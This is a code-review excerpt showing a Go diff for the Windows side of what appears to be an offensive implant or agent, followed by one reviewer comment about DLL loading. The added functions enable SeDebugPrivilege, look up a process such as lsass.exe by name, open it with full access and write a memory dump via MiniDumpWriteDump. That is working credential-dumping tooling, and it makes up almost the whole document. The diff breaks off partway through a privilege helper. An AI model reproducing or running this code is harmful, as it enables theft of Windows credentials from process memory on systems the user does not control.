pkg/agent/exec_windows.go

```diff
@@ -369,4 +372,160 @@ func ExecuteShellcodeQueueUserAPC(shellcode []byte, pid uint32) error {
+func miniDump(process string, pid uint32) ([]byte, error) {
+	ret := []byte{}
+
+	//get debug privs (required for dumping processes not owned by current user)
+	err := sePrivEnable("SeDebugPrivilege")
+	if err != nil {
+		return ret, err
+	}
+	/*
+		BOOL MiniDumpWriteDump(
+		  HANDLE                            hProcess,
+		  DWORD                             ProcessId,
+		  HANDLE                            hFile,
+		  MINIDUMP_TYPE                     DumpType,
+		  PMINIDUMP_EXCEPTION_INFORMATION   ExceptionParam,
+		  PMINIDUMP_USER_STREAM_INFORMATION UserStreamParam,
+		  PMINIDUMP_CALLBACK_INFORMATION    CallbackParam
+		);
+	*/
+	//load up our minidump function
+	k32 := syscall.NewLazyDLL("Dbgcore.dll")
+	m := k32.NewProc("MiniDumpWriteDump")
+
+	//set up the tempfile to write to, automatically remove it once done
+	// TODO: Work out how to do this in memory
+	f, e := ioutil.TempFile(os.TempDir(), "")
+	if e != nil {
+		return ret, e
+	}
+	defer os.Remove(f.Name())
+	stdOutHandle := f.Fd()
+
+	//get our proc ID, and get a handle to the process. If PID is not provided, search for the PID
+	if pid <= 0 {
+		pid = getProcID(process)
+	}
+	if pid <= 0 {
+		return ret, errors.New("could not find the process")
+	}
+	hProc, err := syscall.OpenProcess(0x1F0FFF, false, pid) //PROCESS_ALL_ACCESS := uint32(0x1F0FFF)
+	if err != nil {
+		return ret, err
+	}
+
+	// calls the minidump function
+	r, _, _ := m.Call(uintptr(hProc), uintptr(pid), stdOutHandle, 3, 0, 0, 0)
+
+	f.Close() //idk why this fixes the 'not same as on disk' issue, but it does
+
+	if r != 0 {
+		ret, err = ioutil.ReadFile(f.Name())
+		if err != nil {
+			return ret, err
+		}
+	}
+	return ret, nil
+}
+
+//getProcID returns the PID of the provided process name (eg lsass.exe). PID of < 1 indicates didn't find the process.
+func getProcID(procname string) uint32 {
+	//https://github.com/mitchellh/go-ps/blob/master/process_windows.go
+	handle, err := syscall.CreateToolhelp32Snapshot(
+		0x00000002,
+		0)
+	if handle < 0 {
+		return 0
+	}
+	defer syscall.CloseHandle(handle)
+
+	var entry syscall.ProcessEntry32
+	entry.Size = uint32(unsafe.Sizeof(entry))
+	err = syscall.Process32First(handle, &entry)
+	if err != nil {
+		fmt.Println(err)
+		return 0
+	}
+
+	for {
+		s := ""
+		for _, chr := range entry.ExeFile {
+			if chr != 0 {
+				s = s + string(int(chr))
+			}
+		}
+		if s == procname {
+			return entry.ProcessID
+		}
+		err = syscall.Process32Next(handle, &entry)
+		if err != nil {
+			break
+		}
+	}
+	return 0
+}
+
+//sePrivEnable adjusts the privileges of the current process to add the passed in string. Good for setting 'SeDebugPrivilege'
+func sePrivEnable(s string) error {
+	type LUID struct {
+		LowPart  uint32
+		HighPart int32
+	}
+	type LUID_AND_ATTRIBUTES struct {
+		Luid       LUID
+		Attributes uint32
+	}
+	type TOKEN_PRIVILEGES struct {
+		PrivilegeCount uint32
+		Privileges     [1]LUID_AND_ATTRIBUTES
+	}
+
+	modadvapi32 := syscall.NewLazyDLL("advapi32.dll")
```

Comment:
I would prefer to use NewLazySystemDLL. My understanding is this restricts to only using system DLLs. 
Reference: https://github.com/golang/sys/blob/master/windows/dll_windows.go#L242